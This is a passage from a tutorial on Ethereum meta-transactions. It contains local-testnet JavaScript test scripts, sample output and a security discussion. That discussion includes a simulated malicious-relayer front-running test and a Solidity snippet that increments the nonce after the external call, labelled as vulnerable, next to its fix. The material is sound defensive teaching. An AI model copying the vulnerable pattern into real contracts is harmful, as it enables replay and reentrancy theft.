        &apos;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&apos;, // Anvil account 1
        provider
    );

    console.log(&apos;\nWallets:&apos;);
    console.log(&apos;User:&apos;, userWallet.address);
    console.log(&apos;Relayer:&apos;, relayerWallet.address);

    // Load contract ABIs
    const forwarderArtifact = JSON.parse(
        fs.readFileSync(&apos;out/MinimalForwarder.sol/MinimalForwarder.json&apos;, &apos;utf8&apos;)
    );
    const recipientArtifact = JSON.parse(
        fs.readFileSync(&apos;out/RecipientContract.sol/RecipientContract.json&apos;, &apos;utf8&apos;)
    );

    // Create contract instances
    const forwarder = new ethers.Contract(
        addresses.forwarder,
        forwarderArtifact.abi,
        provider
    );
    const recipient = new ethers.Contract(
        addresses.recipient,
        recipientArtifact.abi,
        provider
    );

    // === STEP 1: User signs meta-transaction (off-chain, free) ===
    console.log(&apos;\n=== STEP 1: User Signs Meta-Transaction (Off-Chain) ===&apos;);

    // Get current nonce for user
    const nonce = await forwarder.getNonce(userWallet.address);
    console.log(&apos;Current nonce:&apos;, nonce.toString());

    // Encode the function call we want to execute
    const recipientInterface = new ethers.Interface(recipientArtifact.abi);
    const functionData = recipientInterface.encodeFunctionData(&apos;setMessage&apos;, [
        &apos;Hello from meta-transaction!&apos;
    ]);

    // Build ForwardRequest
    const request = {
        from: userWallet.address,
        to: addresses.recipient,
        value: 0,
        gas: 500000,
        nonce: Number(nonce),
        data: functionData
    };

    // EIP-712 domain
    const domain = {
        name: &apos;MinimalForwarder&apos;,
        version: &apos;0.0.1&apos;,
        chainId: chainId,
        verifyingContract: addresses.forwarder
    };

    // EIP-712 types
    const types = {
        ForwardRequest: [
            { name: &apos;from&apos;, type: &apos;address&apos; },
            { name: &apos;to&apos;, type: &apos;address&apos; },
            { name: &apos;value&apos;, type: &apos;uint256&apos; },
            { name: &apos;gas&apos;, type: &apos;uint256&apos; },
            { name: &apos;nonce&apos;, type: &apos;uint256&apos; },
            { name: &apos;data&apos;, type: &apos;bytes&apos; }
        ]
    };

    // User signs the typed data
    const signature = await userWallet.signTypedData(domain, types, request);

    console.log(&apos;User signed meta-transaction:&apos;);
    console.log(&apos;  Function: setMessage(&quot;Hello from meta-transaction!&quot;)&apos;);
    console.log(&apos;  Signature:&apos;, signature);
    console.log(&apos;  Gas required: 0 ETH (off-chain signature)&apos;);

    // === STEP 2: Verify signature (off-chain validation) ===
    console.log(&apos;\n=== STEP 2: Relayer Verifies Signature (Off-Chain) ===&apos;);

    const isValid = await forwarder.verify(request, signature);
    console.log(&apos;Signature valid:&apos;, isValid);

    if (!isValid) {
        console.error(&apos;ERROR: Signature verification failed!&apos;);
        process.exit(1);
    }

    // === STEP 3: Relayer submits transaction (on-chain, pays gas) ===
    console.log(&apos;\n=== STEP 3: Relayer Submits Transaction (On-Chain) ===&apos;);

    // Check relayer balance before
    const relayerBalanceBefore = await provider.getBalance(relayerWallet.address);
    console.log(&apos;Relayer balance before:&apos;, ethers.formatEther(relayerBalanceBefore), &apos;ETH&apos;);

    // Relayer submits the transaction
    const forwarderWithRelayer = forwarder.connect(relayerWallet);
    const tx = await forwarderWithRelayer.execute(request, signature, {
        gasLimit: 600000 // Request gas + overhead
    });

    console.log(&apos;Transaction submitted by relayer&apos;);
    console.log(&apos;  TX hash:&apos;, tx.hash);
    console.log(&apos;  Waiting for confirmation...&apos;);

    const receipt = await tx.wait();
    console.log(&apos;  ✓ Transaction confirmed!&apos;);
    console.log(&apos;  Block:&apos;, receipt.blockNumber);
    console.log(&apos;  Gas used:&apos;, receipt.gasUsed.toString());

    // Check relayer balance after (they paid the gas)
    const relayerBalanceAfter = await provider.getBalance(relayerWallet.address);
    const gasCost = relayerBalanceBefore - relayerBalanceAfter;
    console.log(&apos;Relayer balance after:&apos;, ethers.formatEther(relayerBalanceAfter), &apos;ETH&apos;);
    console.log(&apos;Gas cost paid by relayer:&apos;, ethers.formatEther(gasCost), &apos;ETH&apos;);

    // === STEP 4: Verify execution ===
    console.log(&apos;\n=== STEP 4: Verify Contract State ===&apos;);

    const storedMessage = await recipient.messages(userWallet.address);
    console.log(&apos;Message stored for user:&apos;, storedMessage);
    console.log(&apos;Expected message: &quot;Hello from meta-transaction!&quot;&apos;);
    console.log(&apos;Match:&apos;, storedMessage === &apos;Hello from meta-transaction!&apos; ? &apos;✓ YES&apos; : &apos;✗ NO&apos;);

    // Check nonce was incremented
    const newNonce = await forwarder.getNonce(userWallet.address);
    console.log(&apos;\nNonce before:&apos;, nonce.toString());
    console.log(&apos;Nonce after:&apos;, newNonce.toString());
    console.log(&apos;Incremented:&apos;, newNonce &gt; nonce ? &apos;✓ YES&apos; : &apos;✗ NO&apos;);

    // === STEP 5: Test replay protection ===
    console.log(&apos;\n=== STEP 5: Test Replay Protection ===&apos;);
    console.log(&apos;Attempting to replay the same signature...&apos;);

    try {
        const replayTx = await forwarderWithRelayer.execute(request, signature);
        await replayTx.wait();
        console.log(&apos;✗ VULNERABILITY: Replay succeeded! (This should not happen)&apos;);
    } catch (error) {
        console.log(&apos;✓ Replay prevented:&apos;, error.message.includes(&apos;signature invalid&apos;) ?
            &apos;Invalid signature (nonce mismatch)&apos; : error.message);
    }

    console.log(&apos;\n=== Test Complete ===&apos;);
    console.log(&apos;\nSummary:&apos;);
    console.log(&apos;  • User signed message off-chain (no gas cost)&apos;);
    console.log(&apos;  • Relayer submitted transaction (paid gas)&apos;);
    console.log(&apos;  • Contract executed as if user called directly&apos;);
    console.log(&apos;  • Nonce incremented to prevent replay&apos;);
    console.log(&apos;  • User never needed ETH for gas!&apos;);
}

main()
    .then(() =&gt; process.exit(0))
    .catch((error) =&gt; {
        console.error(error);
        process.exit(1);
    });
```

&lt;/details&gt;

### Step-by-Step Execution

Follow these steps to test the complete meta-transaction flow:

**1. Start local Anvil node** (Foundry&apos;s local Ethereum node):

```bash
# Start Anvil in a separate terminal
anvil
```

This starts a local blockchain at `http://localhost:8545` with pre-funded test accounts.

**2. Deploy contracts**:

```bash
# Set deployer private key (Anvil account 0)
export PRIVATE_KEY=0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80

# Deploy contracts to local Anvil
forge script script/Deploy.s.sol --rpc-url http://localhost:8545 --broadcast

# Alternatively, use the shorthand:
forge script script/Deploy.s.sol --rpc-url localhost --broadcast
```

You should see output like:

```
MinimalForwarder deployed at: 0x5FbDB2315678afecb367f032d93F642f64180aa3
RecipientContract deployed at: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512

=== Deployment Complete ===
Copy the following to deployed-addresses.json:

{
  &quot;forwarder&quot;: &quot;0x5FbDB2315678afecb367f032d93F642f64180aa3&quot;,
  &quot;recipient&quot;: &quot;0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512&quot;
}
```

**Create `deployed-addresses.json`** with the addresses from the output:

```bash
# Create the file with your deployed addresses
cat &gt; deployed-addresses.json &lt;&lt; &apos;EOF&apos;
{
  &quot;forwarder&quot;: &quot;0x5FbDB2315678afecb367f032d93F642f64180aa3&quot;,
  &quot;recipient&quot;: &quot;0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512&quot;
}
EOF
```

Replace the addresses with the actual ones from your deployment output.

**3. Build contract artifacts** (required for JavaScript to load ABIs):

```bash
forge build
```

**4. Run the end-to-end test**:

```bash
node test-meta-tx.js
```

You should see output showing each step of the meta-transaction flow:

```
rsgbengi@beru ~/P/w/meta-transaction-demo (main)&gt; node test-meta-tx.js
=== Meta-Transaction End-to-End Test ===

Connected to network: unknown
Chain ID: 31337

Contract Addresses:
Forwarder: 0x5FbDB2315678afecb367f032d93F642f64180aa3
Recipient: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512

Wallets:
User: 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266
Relayer: 0x70997970C51812dc3A010C7d01b50e0d17dc79C8

=== STEP 1: User Signs Meta-Transaction (Off-Chain) ===
Current nonce: 0
User signed meta-transaction:
  Function: setMessage(&quot;Hello from meta-transaction!&quot;)
  Signature: 0xfe316f9bc4b72934c2e62c86998b8c93941d38992e38a7d5be45ab9ca102cce23bb271ac848b69223cb821a427cd51aeb00ff1a9821892cbff32d8f77b1b8b591b
  Gas required: 0 ETH (off-chain signature)

=== STEP 2: Relayer Verifies Signature (Off-Chain) ===
Signature valid: true

=== STEP 3: Relayer Submits Transaction (On-Chain) ===
Relayer balance before: 10000.0 ETH
Transaction submitted by relayer
  TX hash: 0xbcaaa64bb45073eb51d82efb395ef8d639b04c24f42daa306d308efecb8658fe
  Waiting for confirmation...
  ✓ Transaction confirmed!
  Block: 3
  Gas used: 87140
Relayer balance after: 10000.0 ETH
Gas cost paid by relayer: 0.0 ETH

Note: Anvil uses gas-price=0 by default for easier local testing.
The relayer still submitted the transaction (you can see 87,140 gas was used).
In production networks, this would cost real ETH (~$2-5 depending on gas prices).

=== STEP 4: Verify Contract State ===
Message stored for user: Hello from meta-transaction!
Expected message: &quot;Hello from meta-transaction!&quot;
Match: ✓ YES

Nonce before: 0
Nonce after: 1
Incremented: ✓ YES

=== STEP 5: Test Replay Protection ===
Attempting to replay the same signature...
✓ Replay prevented: Invalid signature (nonce mismatch)

=== Test Complete ===

Summary:
  • User signed message off-chain (no gas cost)
  • Relayer submitted transaction (paid gas)
  • Contract executed as if user called directly
  • Nonce incremented to prevent replay
  • User never needed ETH for gas!
```

### Understanding the Flow

Let&apos;s break down what just happened.

**Off-Chain (Free)**:
1. User creates a `ForwardRequest` with the function they want to call
2. User signs the request using EIP-712 typed data signing
3. No blockchain interaction, no gas fees, no ETH required

**Relayer Validation**:
4. Relayer receives the signed request
5. Relayer calls `forwarder.verify()` to check signature validity (view function, no gas)
6. Relayer decides whether to submit (could check rate limits, whitelists, etc.)

**On-Chain (Relayer Pays)**:
7. Relayer calls `forwarder.execute(request, signature)` and pays gas (87,140 gas units)
8. Forwarder verifies signature again (on-chain this time)
9. Forwarder increments user&apos;s nonce (prevents replay)
10. Forwarder forwards call to recipient contract with user&apos;s address appended

&gt; *Note*: In Anvil, gas-price=0 so cost shows as 0 ETH. In production (mainnet/testnets), this would cost real ETH.

**Contract Execution**:
11. Recipient contract receives call from forwarder
12. `_msgSender()` extracts original user address from calldata
13. Function executes as if user called it directly
14. State updates (message stored) are attributed to user, not relayer

**Security Verification**:
15. Nonce incremented, preventing replay attacks
16. Attempting to replay same signature fails with &quot;signature invalid&quot;

This demonstrates the complete meta-transaction pattern. User signs off-chain. Relayer pays gas. Contract executes as user.

### Testing Different Scenarios

You can create additional test scripts to explore different meta-transaction scenarios. Here are complete, ready-to-run examples.

**Feel free to skip these if you want**—they&apos;re here for completeness. The one scenario worth understanding is the front-running attack, which demonstrates a real security risk in meta-transaction systems.

#### Scenario 1: Test Deposit Function

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete Deposit Test Script (test-deposit.js)&lt;/strong&gt;&lt;/summary&gt;

Create `test-deposit.js`:

```javascript
const { ethers } = require(&apos;ethers&apos;);
const fs = require(&apos;fs&apos;);

async function main() {
    console.log(&apos;=== Testing Deposit via Meta-Transaction ===\n&apos;);

    const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);
    const addresses = JSON.parse(fs.readFileSync(&apos;deployed-addresses.json&apos;, &apos;utf8&apos;));

    // Setup wallets
    const userWallet = new ethers.Wallet(
        &apos;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&apos;,
        provider
    );
    const relayerWallet = new ethers.Wallet(
        &apos;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&apos;,
        provider
    );

    // Load contracts
    const forwarderArtifact = JSON.parse(
        fs.readFileSync(&apos;out/MinimalForwarder.sol/MinimalForwarder.json&apos;, &apos;utf8&apos;)
    );
    const recipientArtifact = JSON.parse(
        fs.readFileSync(&apos;out/RecipientContract.sol/RecipientContract.json&apos;, &apos;utf8&apos;)
    );

    const forwarder = new ethers.Contract(addresses.forwarder, forwarderArtifact.abi, provider);
    const recipient = new ethers.Contract(addresses.recipient, recipientArtifact.abi, provider);

    // Build deposit request
    const nonce = await forwarder.getNonce(userWallet.address);
    const network = await provider.getNetwork();
    const chainId = Number(network.chainId);

    const recipientInterface = new ethers.Interface(recipientArtifact.abi);
    const functionData = recipientInterface.encodeFunctionData(&apos;deposit&apos;);

    const request = {
        from: userWallet.address,
        to: addresses.recipient,
        value: ethers.parseEther(&apos;0.1&apos;), // Deposit 0.1 ETH
        gas: 500000,
        nonce: Number(nonce),
        data: functionData
    };

    const domain = {
        name: &apos;MinimalForwarder&apos;,
        version: &apos;0.0.1&apos;,
        chainId: chainId,
        verifyingContract: addresses.forwarder
    };

    const types = {
        ForwardRequest: [
            { name: &apos;from&apos;, type: &apos;address&apos; },
            { name: &apos;to&apos;, type: &apos;address&apos; },
            { name: &apos;value&apos;, type: &apos;uint256&apos; },
            { name: &apos;gas&apos;, type: &apos;uint256&apos; },
            { name: &apos;nonce&apos;, type: &apos;uint256&apos; },
            { name: &apos;data&apos;, type: &apos;bytes&apos; }
        ]
    };

    console.log(&apos;User signs deposit of 0.1 ETH...&apos;);
    const signature = await userWallet.signTypedData(domain, types, request);

    console.log(&apos;Relayer submits transaction with value...&apos;);
    const forwarderWithRelayer = forwarder.connect(relayerWallet);
    const tx = await forwarderWithRelayer.execute(request, signature, {
        gasLimit: 600000,
        value: ethers.parseEther(&apos;0.1&apos;) // Relayer sends ETH to forwarder
    });

    await tx.wait();
    console.log(&apos;✓ Transaction confirmed!&apos;);

    // Check user&apos;s balance in contract
    const balance = await recipient.balances(userWallet.address);
    console.log(&apos;\nUser balance in contract:&apos;, ethers.formatEther(balance), &apos;ETH&apos;);
    console.log(&apos;Expected: 0.1 ETH&apos;);
    console.log(&apos;Match:&apos;, balance === ethers.parseEther(&apos;0.1&apos;) ? &apos;✓ YES&apos; : &apos;✗ NO&apos;);
}

main()
    .then(() =&gt; process.exit(0))
    .catch((error) =&gt; {
        console.error(error);
        process.exit(1);
    });
```

&lt;/details&gt;

#### Scenario 2: Test Multiple Sequential Transactions

This scenario demonstrates an important edge case. Rapid sequential meta-transactions expose a nonce management issue with ethers.js.

**The Two-Nonce Problem**: Meta-transaction systems actually deal with **two different nonces**:

1. **Contract nonce** (in `MinimalForwarder`): Prevents replay attacks on meta-transactions. Managed per-user by the forwarder contract.
2. **Relayer account nonce** (Ethereum protocol): Orders the relayer&apos;s on-chain transactions. Managed per-account by the Ethereum network.

When you submit multiple meta-transactions rapidly in the same script, ethers.js&apos;s internal nonce cache doesn&apos;t update fast enough. The library caches the relayer&apos;s account nonce and doesn&apos;t refresh it between transactions, causing &quot;nonce too low&quot; errors on the second transaction.

**The Solution**: Manually manage the relayer&apos;s account nonce outside of ethers.js&apos;s automatic management. Fetch it once at the start, then increment it manually for each transaction.

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete Sequential Transactions Test (test-sequential.js)&lt;/strong&gt;&lt;/summary&gt;

Create `test-sequential.js`:

```javascript
const { ethers } = require(&apos;ethers&apos;);
const fs = require(&apos;fs&apos;);

async function main() {
    console.log(&apos;=== Testing Multiple Sequential Meta-Transactions ===\n&apos;);

    const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);
    const addresses = JSON.parse(fs.readFileSync(&apos;deployed-addresses.json&apos;, &apos;utf8&apos;));

    const userWallet = new ethers.Wallet(
        &apos;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&apos;,
        provider
    );
    const relayerWallet = new ethers.Wallet(
        &apos;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&apos;,
        provider
    );

    const forwarderArtifact = JSON.parse(
        fs.readFileSync(&apos;out/MinimalForwarder.sol/MinimalForwarder.json&apos;, &apos;utf8&apos;)
    );
    const recipientArtifact = JSON.parse(
        fs.readFileSync(&apos;out/RecipientContract.sol/RecipientContract.json&apos;, &apos;utf8&apos;)
    );

    const forwarder = new ethers.Contract(addresses.forwarder, forwarderArtifact.abi, provider);
    const recipient = new ethers.Contract(addresses.recipient, recipientArtifact.abi, provider);
    const recipientInterface = new ethers.Interface(recipientArtifact.abi);

    const network = await provider.getNetwork();
    const chainId = Number(network.chainId);

    const domain = {
        name: &apos;MinimalForwarder&apos;,
        version: &apos;0.0.1&apos;,
        chainId: chainId,
        verifyingContract: addresses.forwarder
    };

    const types = {
        ForwardRequest: [
            { name: &apos;from&apos;, type: &apos;address&apos; },
            { name: &apos;to&apos;, type: &apos;address&apos; },
            { name: &apos;value&apos;, type: &apos;uint256&apos; },
            { name: &apos;gas&apos;, type: &apos;uint256&apos; },
            { name: &apos;nonce&apos;, type: &apos;uint256&apos; },
            { name: &apos;data&apos;, type: &apos;bytes&apos; }
        ]
    };

    const forwarderWithRelayer = forwarder.connect(relayerWallet);

    // Send 3 sequential messages
    const messages = [&apos;Message 1&apos;, &apos;Message 2&apos;, &apos;Message 3&apos;];

    // SECURITY: Get initial relayer nonce once and manage it manually
    // This prevents ethers.js nonce caching issues in rapid sequential transactions
    let relayerNonce = await provider.getTransactionCount(relayerWallet.address, &apos;latest&apos;);

    for (let i = 0; i &lt; messages.length; i++) {
        console.log(`\n--- Transaction ${i + 1}/3 ---`);

        // Get current contract nonce (increases each iteration)
        const nonce = await forwarder.getNonce(userWallet.address);
        console.log(&apos;Current contract nonce:&apos;, nonce.toString());
        console.log(&apos;Current relayer nonce:&apos;, relayerNonce);

        // Build request
        const functionData = recipientInterface.encodeFunctionData(&apos;setMessage&apos;, [messages[i]]);
        const request = {
            from: userWallet.address,
            to: addresses.recipient,
            value: 0,
            gas: 500000,
            nonce: Number(nonce),
            data: functionData
        };

        // User signs
        const signature = await userWallet.signTypedData(domain, types, request);
        console.log(&apos;User signed:&apos;, messages[i]);

        // Relayer submits with manually managed nonce
        const tx = await forwarderWithRelayer.execute(request, signature, {
            gasLimit: 600000,
            nonce: relayerNonce  // Use manually tracked nonce
        });

        // Wait for confirmation
        await tx.wait();
        console.log(&apos;✓ Transaction confirmed&apos;);

        // Increment nonce for next iteration
        relayerNonce++;
    }

    // Verify final message
    const finalMessage = await recipient.messages(userWallet.address);
    console.log(&apos;\n=== Results ===&apos;);
    console.log(&apos;Final message:&apos;, finalMessage);
    console.log(&apos;Expected: &quot;Message 3&quot;&apos;);
    console.log(&apos;Match:&apos;, finalMessage === &apos;Message 3&apos; ? &apos;✓ YES&apos; : &apos;✗ NO&apos;);
}

main()
    .then(() =&gt; process.exit(0))
    .catch((error) =&gt; {
        console.error(error);
        process.exit(1);
    });
```

**Key Implementation Details:**

```javascript
// Fetch relayer&apos;s account nonce once
let relayerNonce = await provider.getTransactionCount(relayerWallet.address, &apos;latest&apos;);

// Use it explicitly in each transaction
const tx = await forwarderWithRelayer.execute(request, signature, {
    gasLimit: 600000,
    nonce: relayerNonce  // Manual control
});

await tx.wait();
relayerNonce++;  // Manual increment
```

This pattern is necessary when:
- Submitting multiple transactions from the same relayer rapidly
- Building batch transaction systems
- Testing meta-transaction flows programmatically

In production relayer services, this is typically handled by a transaction queue that manages nonces across concurrent requests.

&lt;/details&gt;

#### Scenario 3: Test Front-Running Protection

This test demonstrates an important security property. **ERC-2771 protects against identity-based front-running**. The relayer can control transaction ordering but cannot impersonate the user.

**What This Test Shows:**

The malicious relayer attempts to:
1. Intercept the user&apos;s signed meta-transaction
2. Send their own message first to &quot;claim&quot; the action
3. Then (maybe) submit the user&apos;s transaction

**Expected Result:** The user&apos;s message should still be correctly attributed to them, not affected by the relayer&apos;s front-running attempt. This is because `_msgSender()` correctly extracts the original user&apos;s address from the meta-transaction calldata, ensuring the relayer writes to `messages[relayerAddress]` while the user writes to `messages[userAddress]`. Completely separate storage slots.

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete Front-Running Test (test-front-running.js)&lt;/strong&gt;&lt;/summary&gt;

Create `test-front-running.js`:

```javascript
const { ethers } = require(&apos;ethers&apos;);
const fs = require(&apos;fs&apos;);

async function main() {
    console.log(&apos;=== Testing Front-Running Protection ===\n&apos;);

    const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);
    const addresses = JSON.parse(fs.readFileSync(&apos;deployed-addresses.json&apos;, &apos;utf8&apos;));

    const userWallet = new ethers.Wallet(
        &apos;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&apos;,
        provider
    );
    const relayerWallet = new ethers.Wallet(
        &apos;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&apos;,
        provider
    );

    const forwarderArtifact = JSON.parse(
        fs.readFileSync(&apos;out/MinimalForwarder.sol/MinimalForwarder.json&apos;, &apos;utf8&apos;)
    );
    const recipientArtifact = JSON.parse(
        fs.readFileSync(&apos;out/RecipientContract.sol/RecipientContract.json&apos;, &apos;utf8&apos;)
    );

    const forwarder = new ethers.Contract(addresses.forwarder, forwarderArtifact.abi, provider);
    const recipient = new ethers.Contract(addresses.recipient, recipientArtifact.abi, provider);
    const recipientInterface = new ethers.Interface(recipientArtifact.abi);

    const network = await provider.getNetwork();
    const chainId = Number(network.chainId);

    // User wants to set their message
    const userMessage = &apos;User message - this is mine!&apos;;
    console.log(&apos;User wants to set:&apos;, userMessage);

    // Build and sign meta-transaction
    const nonce = await forwarder.getNonce(userWallet.address);
    const functionData = recipientInterface.encodeFunctionData(&apos;setMessage&apos;, [userMessage]);

    const request = {
        from: userWallet.address,
        to: addresses.recipient,
        value: 0,
        gas: 500000,
        nonce: Number(nonce),
        data: functionData
    };

    const domain = {
        name: &apos;MinimalForwarder&apos;,
        version: &apos;0.0.1&apos;,
        chainId: chainId,
        verifyingContract: addresses.forwarder
    };

    const types = {
        ForwardRequest: [
            { name: &apos;from&apos;, type: &apos;address&apos; },
            { name: &apos;to&apos;, type: &apos;address&apos; },
            { name: &apos;value&apos;, type: &apos;uint256&apos; },
            { name: &apos;gas&apos;, type: &apos;uint256&apos; },
            { name: &apos;nonce&apos;, type: &apos;uint256&apos; },
            { name: &apos;data&apos;, type: &apos;bytes&apos; }
        ]
    };

    const signature = await userWallet.signTypedData(domain, types, request);
    console.log(&apos;✓ User signed meta-transaction\n&apos;);

    // SECURITY: Get initial relayer nonce for manual management
    // This script sends 2 transactions from relayer (front-run attempt + meta-tx)
    let relayerNonce = await provider.getTransactionCount(relayerWallet.address, &apos;latest&apos;);

    // ATTACK: Malicious relayer tries to front-run
    console.log(&apos;⚠️  ATTACK: Relayer tries to front-run by setting their own message first&apos;);
    const maliciousMessage = &apos;Relayer was here - hacked!&apos;;

    try {
        const maliciousTx = await recipient.connect(relayerWallet).setMessage(maliciousMessage, {
            nonce: relayerNonce
        });
        await maliciousTx.wait();
        console.log(&apos;   Relayer set their message:&apos;, maliciousMessage);
        relayerNonce++;  // Increment after first transaction
    } catch (error) {
        console.log(&apos;   Front-run attempt failed:&apos;, error.message);
    }

    // Relayer submits user&apos;s meta-transaction
    console.log(&apos;\nRelayer submits user meta-transaction...&apos;);
    const forwarderWithRelayer = forwarder.connect(relayerWallet);
    const tx = await forwarderWithRelayer.execute(request, signature, {
        gasLimit: 600000,
        nonce: relayerNonce  // Use manually managed nonce
    });
    await tx.wait();
    console.log(&apos;✓ User meta-transaction confirmed\n&apos;);

    // Check final state
    const finalMessage = await recipient.messages(userWallet.address);

    console.log(&apos;=== Results ===&apos;);
    console.log(&apos;Final message:&apos;, finalMessage);
    console.log(&apos;Expected:&apos;, userMessage);
    console.log(&apos;\nFront-run protection:&apos;, finalMessage === userMessage ? &apos;✓ WORKS&apos; : &apos;✗ FAILED&apos;);
    console.log(&apos;\nExplanation:&apos;);
    console.log(&apos;The relayer wrote to messages[relayerAddress] when calling setMessage() directly.&apos;);
    console.log(&apos;The user meta-transaction wrote to messages[userAddress] via _msgSender().&apos;);
    console.log(&apos;These are DIFFERENT storage slots, so no interference occurred.&apos;);
    console.log(&apos;ERC-2771 prevents identity impersonation, not transaction reordering.&apos;);
}

main()
    .then(() =&gt; process.exit(0))
    .catch((error) =&gt; {
        console.error(error);
        process.exit(1);
    });
```

**Expected Output:**

```
=== Testing Front-Running Protection ===

User wants to set: User message - this is mine!
✓ User signed meta-transaction

⚠️  ATTACK: Relayer tries to front-run by setting their own message first
   Relayer set their message: Relayer was here - hacked!

Relayer submits user meta-transaction...
✓ User meta-transaction confirmed

=== Results ===
Final message: User message - this is mine!
Expected: User message - this is mine!

Front-run protection: ✓ WORKS

Explanation:
The relayer wrote to messages[relayerAddress] when calling setMessage() directly.
The user meta-transaction wrote to messages[userAddress] via _msgSender().
These are DIFFERENT storage slots, so no interference occurred.
ERC-2771 prevents identity impersonation, not transaction reordering.
```

**Key Insight:** ERC-2771 protects against **identity-based front-running** where the relayer tries to impersonate the user. However, it does NOT protect against:

- **Timing-based front-running**: Relayer can still delay or reorder transactions
- **Censorship**: Relayer can refuse to submit certain transactions
- **Global state front-running**: If a function operates on global state (like &quot;first to claim wins&quot;), the relayer can front-run by submitting their own transaction first

For global state operations, you need additional application-level protections like merkle proofs that bind actions to specific addresses, or commit-reveal schemes.

&lt;/details&gt;

These complete scripts can be run directly after deploying contracts. Each demonstrates a different aspect of meta-transaction behavior and security.

## Security Considerations

Meta-transactions introduce several attack surfaces that don&apos;t exist in standard transactions. Let&apos;s examine each one.

### Nonce Management

Nonces prevent replay attacks. Without them, an attacker could capture a signed meta-transaction and replay it multiple times.

The forwarder maintains a separate nonce counter for each user address.

Here&apos;s how nonce verification works:

![](/content/images/2025/11/nonce-management.svg)

*Nonce management diagram*

The nonce must be incremented before the external call (checks-effects-interactions pattern). If incremented after, a reentrant call could replay the transaction:

```solidity
// VULNERABILITY: Nonce incremented after external call
function execute(ForwardRequest calldata req, bytes calldata sig) external {
    require(verify(req, sig), &quot;Invalid signature&quot;);

    // External call happens first
    (bool success, ) = req.to.call(req.data);

    // VULNERABILITY: Nonce incremented after
    // If req.to is malicious and re-enters, nonce is still the same
    _nonces[req.from]++;
}

// FIX: Increment nonce before external call
function execute(ForwardRequest calldata req, bytes calldata sig) external {
    require(verify(req, sig), &quot;Invalid signature&quot;);

    // FIX: Increment nonce first
    _nonces[req.from]++;

    // Now external call is safe from replay
    (bool success, ) = req.to.call(req.data);
}
```

**Nonce Management on Failure**: If a meta-transaction&apos;s forwarded call reverts, should the nonce still increment?

**OpenZeppelin&apos;s MinimalForwarder approach** (lines 217-218): **Yes, always increment**. The nonce increments before the external call, regardless of whether that call succeeds or fails. This prevents a griefing attack where a malicious recipient contract could intentionally revert to block the user&apos;s nonce forever.

This mirrors Ethereum&apos;s account nonce behavior. Once a transaction is included in a block, the nonce increments even if the transaction reverts. The user can then sign a new meta-transaction with the next nonce.

**Alternative approaches** (not recommended): Some implementations allow nonce reuse on failure, but this creates a denial-of-service vector where attackers can block specific users by causing their transactions to fail repeatedly.

**Best Practice**: Always increment nonces before external calls (checks-effects-interactions pattern), regardless of call outcome. This is what our MinimalForwarder implementation does.

### Replay Across Chains and Forwarders

What if the same forwarder contract is deployed at the same address on multiple chains? An attacker could capture a signed meta-transaction on one chain and replay it on another.

This is why including the `chainId` in the [EIP-712](https://eips.ethereum.org/EIPS/eip-712) domain separator is **mandatory for production applications**. While technically optional according to the EIP-712 specification, omitting chainId creates a cross-chain replay vulnerability.

Always include chainId to bind the signature to a specific chain:

```javascript
// SECURITY: chainId is REQUIRED to prevent cross-chain replay attacks
// Never omit chainId in production applications
const domain = {
    name: &apos;MinimalForwarder&apos;,
    version: &apos;1.0.0&apos;,
    chainId: 1,  // REQUIRED: Ethereum mainnet
    verifyingContract: forwarderAddress
};
```

If an attacker tries to replay the signature on a different chain (e.g., Polygon with chainId 137), the signature verification will fail because the domain separator won&apos;t match.

But what about multiple forwarder contracts on the same chain? If you deploy two forwarder instances, each maintains independent nonces. An attacker could potentially replay a signature across forwarders if the recipient contract trusts both.

The solution is to limit the trusted forwarder to a single address per recipient contract:

```solidity
// SECURE: Only one trusted forwarder
address public immutable trustedForwarder;

// VULNERABILITY: Multiple trusted forwarders create replay risk
mapping(address =&gt; bool) public trustedForwarders;
```

### Front-Running and MEV

As demonstrated in the [front-running test scenario](#scenario-3-test-front-running-protection), ERC-2771 prevents identity impersonation but doesn&apos;t eliminate all front-running risks.

**Key Design Principle:** Avoid global state operations in meta-transaction recipients. Instead, bind actions to specific addresses:

```solidity
// ❌ VULNERABLE: Global state allows relayer front-running
uint256 public itemsRemaining = 100;  // First-come-first-served

// ✅ SECURE: User-specific eligibility
mapping(address =&gt; bool) public canClaim;  // Reserved per address
```

For operations requiring shared state, implement additional protections:
- Merkle proofs binding actions to specific addresses
- Commit-reveal schemes for sensitive operations
- Deadline enforcement to limit timing manipulation windows

### Malicious Relayer Scenarios

A malicious relayer has several options for misbehavior.

**Censorship**: Refuse to submit transactions from certain users. This is hard to prevent without decentralized relayer networks or fallback mechanisms.

**Delay**: Submit transactions only when it benefits the relayer (e.g., wait for gas prices to spike so users see the cost).

**MEV Extraction**: Reorder transactions to extract maximum value, similar to how block builders operate.

**Griefing**: Submit transactions that are designed to fail, wasting the user&apos;s nonce and forcing them to re-sign.

Additional protection can include deadline parameters in custom implementations. However, the standard OpenZeppelin MinimalForwarder doesn&apos;t include deadline checking. Applications can add this as an enhancement or implement off-chain validation to detect and reject stale requests.

## Attack Patterns

Let&apos;s examine specific exploit scenarios that target meta-transaction implementations.

### Attack: Replay Across Relayers

Imagine two relayer services both operating with the same forwarder contract. A user signs a meta-transaction and sends it to Relayer A. An attacker intercepts the signed message and sends it to Relayer B.

&lt;details&gt;
